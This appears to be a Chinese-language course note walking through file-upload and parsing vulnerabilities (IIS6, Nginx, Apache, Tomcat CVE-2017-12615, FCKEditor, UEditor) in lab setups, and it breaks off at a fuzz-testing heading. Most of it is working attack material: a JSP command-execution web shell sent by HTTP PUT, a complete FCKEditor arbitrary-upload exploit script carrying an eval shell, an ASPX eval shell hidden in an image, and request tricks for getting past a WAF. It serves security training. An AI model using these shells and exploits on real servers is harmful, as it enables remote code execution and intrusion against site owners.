一、解析漏洞
需要vulhub环境。
点击查看代码
编译:sudo docker-compose build
启动:sudo docker-compose up -d
关闭:sudo docker-compose down
1、IIS6
vulhub 里面没有 IIS 的靶场,可以用课程资料的03 server r1版本,用户名密码:administrator/123456。
解析漏洞介绍
1)当建立.asa、.asp 格式的文件夹时,其目录下的任意文件都将被 IIS 当做 asp 文件解析。
2)当文件*.asp;1.jpg IIS6.0 同样会将文件当做 asp 文件解析。
步骤
- 新建一个 IIS.ASP 文件
点击查看代码
<% response.write("i am hacker")%>
- 把 IIS.ASP 复制一份,命名为 IIS.asp;IIS.jpg
- 把 IIS.asp;IIS.jpg,放到网站目录C:\IIS6Web
- 访问服务器地址IP路径
2、tomcat
1)思路:当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法,攻击者将可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
点击查看代码
cd /home/enjoy/vulhub-master/tomcat/CVE-2017-12615
docker-compose build
docker-compose up -d
docker-compose config
2)宿主机访问虚拟机 http://192.168.254.135:8080/
3)使用 BP 发包,上传.jsp 文件
点击查看代码
PUT /1.jsp/ HTTP/1.1
Host: 192.168.254.135:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 750
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();
try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;while ((temp = buf.readLine()) != null) {
line.append(temp+"\n");}buf.close();} catch (Exception e) {
line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){
out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
4)访问 http://192.168.254.135:8080/1.jsp?&pwd=023&cmd=dir,在CMD="可以施展dir以外的任何DOS命令"
3、Nginx
思路:1.jpg/.php -> 1.jpg 会被当成 php 格式解析加上/.php 后文件以 php 格式解析。
服务器端
cd /home/enjoy/vulhub-master/nginx/nginx_parsing_vulnerability
点击查看代码
sudo docker-compose build
sudo docker-compose up -d
sudo docker-compose config
宿主机输入虚拟机服务器IP:192.168.254.135,上传图片文件
访问:http://192.168.254.135/uploadfiles/db7f1a5d97d66c9bba4550973b6dafc8.png/a.php
4、Apache
思路:apahe解析文件时有一个特性,Apache默认一个文件可以有多个以点分割的后缀,apache 会从最右边开始识别其后缀名,只要一个文件含有.php 后缀的文件即将被识别成 PHP 文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。
1)虚拟机服务器开启相关服务
点击查看代码
cd /home/enjoy/vulhub-master/httpd/apache_parsing_vulnerability
sudo docker-compose build
sudo docker-compose up -d
sudo docker-compose config
5、Apache 换行解析漏洞
思路:2.4.0~2.4.29 版本中存在一个解析漏洞,在解析 PHP 时,1.php\x0A 将被按照 PHP后缀进行解析,导致绕过一些服务器的安全策略。
1)虚拟机服务器端命令
点击查看代码
cd /home/enjoy/vulhub-master/httpd/CVE-2017-15715
sudo docker-compose build
sudo docker-compose up -d
sudo docker-compose config
2)访问 http://192.168.254.135:8080/index.php,上脚本
3)BP 拦截,将抓到的包中文件名evil.php修改为1.php
4)发送给Repeater,切换到Hex 16进制代码,在 1.php 附近代码行查找 70 与 0d,在两组字节之间insert byte:0a,然后send
5)切换Repeater,将POST/后index.php替换为1.php%0a然后send,response-render出现服务器PHP版本信息说明文件上传成功,漏洞复现完成。
二、编辑器漏洞
1)fckeditor编辑器漏洞
思路:将fckeditor解压至upload-labs 靶场的D:\upload-labs-env目录内,修改fckeditor\editor\filemanager\connectors\php\路径下config.php文件
访问 http://localhost/fckeditor/_whatsnew.html
新建 .php文件
点击查看代码
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) &&
in_array($match[1], array(0, 201)));
}
print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\";
filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[cmd]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
$packet = "POST
{$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername."
HTTP/1.0\r\n";//print $packet;
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------
265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";
?>
命令拼接
点击查看代码
cd D:\upload-labs-env\PHP>(找到包含php.exe文件的目录CMD)php.exe(输入php.exe) C:\Users\运输大队长\Desktop\fck.php(拖拽.php文件至CMD) 127.0.0.1:80 /fckeditor/(复制fckeditor固定文件路径)
D:\upload-labs-env\PHP>php.exe C:\Users\运输大队长\Desktop\fck.php 127.0.0.1:80 /fckeditor/
以上操作只为上传一个.php这件事!
点击查看代码
<?php eval($_POST[cmd]) ?>
($_POST[cmd])使用POST方式获取cmd的参数
eval把获得的参数当作代码来执行
2、ueditor
需要 windows 2008 环境,需要外网服务器
1)虚拟机加载2008,开始菜单打开IIS应用
方法1:网站目录下uedit,右侧点击浏览网站(端口号88)
方法2:ipconfig本机IP地址+端口号,使用浏览器操作
2)访问连接,http://192.168.254.136:88/net/controller.ashx,以下界面表示搭建环境正常
3)上 shell.aspx 文件
点击查看代码
<% @Page Language="Jscript"%><%eval(Request.Item["req"],"unsafe");%>
4)制作图片文件
点击查看代码
copy image.png /b + shell.aspx /a ueditor.jpg
点击查看代码
<form action="http://192.168.254.136:88/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
3、Waf 绕过
(安全狗)环境
点击查看代码
cd C:\Users\86188\Desktop\tool\upload-labs-env\Apache\bin
httpd.exe -k install -n apache2.0
#如果要删除
sc delete apache2.0
1)垃圾数据溢出**就在验证的字段里面写很多垃圾数据
BP修改代码
点击查看代码
POST /Pass-02/index.php HTTP/1.1
Host: 192.168.0.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/118.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
13579348911060107162093134725
Content-Length: 823
Origin: http://192.168.0.25
Connection: close
Referer: http://192.168.0.25/Pass-02/index.php
Upgrade-Insecure-Requests: 1-----------------------------13579348911060107162093134725
Content-Disposition: form-data;
asdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdassdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdassdsasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdddasdasdasdasdasdasasdasaddasdasdadasdasdasdasdasdassdasdasdasasdasdasdasdasdassdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdassssssdasdasdasdasdasdasdasdasdasdasdasdas;
name="upload_file"; filename="info.php"
Content-Type: image/png
-----------------------------13579348911060107162093134725
Content-Disposition: form-data; name="submit" 上传
-----------------------------13579348911060107162093134725--
点击查看代码
-----------------------------13579348911060107162093134725
Content-Disposition: form-data;name="upload_file"; filename="info.php;
Content-Type: image/png
3)数据截断 分号代表一个语句的结束
点击查看代码
Content-Disposition: form-data;name="upload_file";
filename="x.jpg;.php";
Content-Type: image/png
4)换行
点击查看代码
Content-Disposition: form-data;name="upload_file";
filename="
a
.
p
h
p";
Content-Type: image/png
4、fuzz测试
